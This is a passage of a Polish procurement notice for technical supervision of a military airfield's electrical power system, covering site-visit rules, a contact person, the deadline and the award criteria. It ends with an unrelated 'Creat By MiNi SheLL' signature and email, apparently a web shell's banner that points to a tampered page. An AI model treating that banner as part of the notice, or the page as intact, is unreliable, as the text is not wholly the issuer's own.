Nadzorujący odpowiedzialny jest za wykonywanie prac związanych z nadzorem technicznym nad pracami serwisowymi i naprawami systemu energetycznego lotniska w tym praca z dokumentacją techniczną i formalno-prawną oraz  wykonywanie czynności nadzoru nad pracami montażowi  i rozruchowymi w obszarze elektrycznym (obwody pierwotne i wtórne, w tym: zabezpieczenia elektryczne, układy sterowania elektrycznego, automatyki sterowania  oraz pomiary).
WIZJA LOKALNA:
Dopuszcza się możliwość dokonania wizji w terenie po uprzednim pisemnym powiadomieniu 
z dwu dniowym wyprzedzeniem w celu uzyskania zgody na wjazd na teren obiektu wojskowego, pismo powinno zawierać: imię (imiona) i nazwisko (nazwiska) osób oraz markę i nr rejestracyjny pojazdu. Przedmiotowe pismo należy adresować: Dowódca Jednostki Wojskowej 1300, 
ul. Powstańców Warszawy 28B, 83-000 Pruszcz Gdański i wysłać na fax: 58 682 44 77.
Przed wykonywaniem prac należy:
a)Wjazd na teren lotniska uzgodnić z dwudniowym wyprzedzeniem pismem do Dowódcy  Jednostki Wojskowej 1300, fax: 58 682 44 77   podając: 
- imię, nazwisko oraz nr dowodu osobistego operatora kierowcy,
- rodzaj pojazdu urządzenia oraz numer rejestracyjny.
b)Poruszanie po terenie lotniska odbywa się wyłącznie po wyznaczonych drogach.
c)Przed przystąpieniem do wykonania przedmiotu umowy zostanie przeprowadzone  szkolenie dotyczące zasad poruszania się po terenie lotniska oraz przestrzegania instrukcji FOD, które należy  bezwzględnie przestrzegać.
W sprawie wizji lokalnej należy kontaktować się z upoważnionym przedstawicielem Zamawiającego w tym zakresie, którym jest: 
Kierownik Sekcji Obsługi Infrastruktury -  Wanda SELNER,  tel. 261 271 251,   kom. sł. 693 301 989..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.33.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin płatności za fakturę - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com